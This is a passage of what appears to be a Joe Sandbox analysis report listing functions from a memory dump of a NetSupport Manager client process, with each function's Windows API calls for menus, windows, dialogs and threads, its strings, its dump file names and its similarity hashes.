                                                                                        • Instruction Fuzzy Hash: 64410E79F0411AABD700DFA59C81E9EFBB9EB8462CF524535F909E7240EA306904CBE1
                                                                                        Function 1102310A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1115ADD0: IsIconic.USER32(?), ref: 1115AE77
                                                                                          • Part of subcall function 1115ADD0: ShowWindow.USER32(?,00000009), ref: 1115AE87
                                                                                          • Part of subcall function 1115ADD0: BringWindowToTop.USER32(?), ref: 1115AE91
                                                                                        • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102324D
                                                                                        • ShowWindow.USER32(?,00000003), ref: 110232D1
                                                                                        • LoadMenuA.USER32(00000000,000013A3), ref: 110233FB
                                                                                        • GetSubMenu.USER32(00000000,00000000), ref: 11023409
                                                                                        • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023429
                                                                                        • GetDlgItem.USER32(?,000013B2), ref: 1102343C
                                                                                        • GetWindowRect.USER32(00000000), ref: 11023443
                                                                                        • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023499
                                                                                        • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 110234A3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                        • String ID: AddToJournal$Chat
                                                                                        • API String ID: 693070851-2976406578
                                                                                        • Opcode ID: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                        • Instruction ID: 337dba7d0f02a97e7c7211def3ec221287211942730252afe18814347e7ecccc
                                                                                        • Opcode Fuzzy Hash: d2fe2766ddb3d34030bb972f012e30f748b4f8edd59272365cd546290ab4e6ab
                                                                                        • Instruction Fuzzy Hash: 87A1F178B04616ABDB09DF74CC85FAEB3E5AB88704F504519EA26DF2C0CF74B9408B65
                                                                                        Function 1115F100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                        • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                        • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                        • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                        • API String ID: 3960414890-2201682149
                                                                                        • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                        • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                        • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                        • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                        Function 11025122 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                        • _strncat.LIBCMT ref: 1102518B
                                                                                        • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                        • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                        • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                        • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                        • SetFocus.USER32(?), ref: 11025265
                                                                                          • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3832070631-0
                                                                                        • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                        • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                        • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                        • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                        Function 11002100 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000), ref: 110021A4
                                                                                        • SetCursor.USER32(00000000), ref: 110021AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load
                                                                                        • String ID: RF>$RW>$Rh>$Ry>
                                                                                        • API String ID: 1675784387-4149278736
                                                                                        • Opcode ID: ccc6a066fdd1516699309e20ca3577cdd6dbae39598298960067ff8a39208018
                                                                                        • Instruction ID: 86d1e62847d0437b4ac10ca901b2b65aff75ed6ab5d8aec964a8a63e5e98fc0c
                                                                                        • Opcode Fuzzy Hash: ccc6a066fdd1516699309e20ca3577cdd6dbae39598298960067ff8a39208018
                                                                                        • Instruction Fuzzy Hash: 5E112BBDD0C1E6A7F304C6258CA6F7A326C8BD53C5F408832F945C9284C97DE800B234
                                                                                        Function 11147110 Relevance: 9.0, APIs: 6, Instructions: 48threadsynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                        • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                        • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 180989782-0
                                                                                        • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                        • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                        • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                        • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                        Function 11143110 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                        • _strrchr.LIBCMT ref: 1114315A
                                                                                        • _strrchr.LIBCMT ref: 1114316A
                                                                                        • wsprintfA.USER32 ref: 11143185
                                                                                          • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                        • String ID: SHV
                                                                                        • API String ID: 2529650285-722696247
                                                                                        • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                        • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                        • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                        • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                        Function 11014110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,00001002,?,00000000), ref: 11014142
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        • m_hWnd, xrefs: 11014126
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014121
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                        • API String ID: 819365019-3966830984
                                                                                        • Opcode ID: f088c587b30f06de9e97c7295ecad2ca59e989c08ba0d6fbfe08a9c69469adba
                                                                                        • Instruction ID: 8b3d7ba69e5a145072af1ccd44eaaa1231f9c6ae13f618dfcc42dde169188c16
                                                                                        • Opcode Fuzzy Hash: f088c587b30f06de9e97c7295ecad2ca59e989c08ba0d6fbfe08a9c69469adba
                                                                                        • Instruction Fuzzy Hash: E1E02B3574031DBBD320DA91EC06FD2F38C9B14764F044435FA245B284DAB0F880C3A4
                                                                                        Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                        • m_hWnd, xrefs: 11001126
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                        • API String ID: 1604732272-2830328467
                                                                                        • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                        • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                        • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                        • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4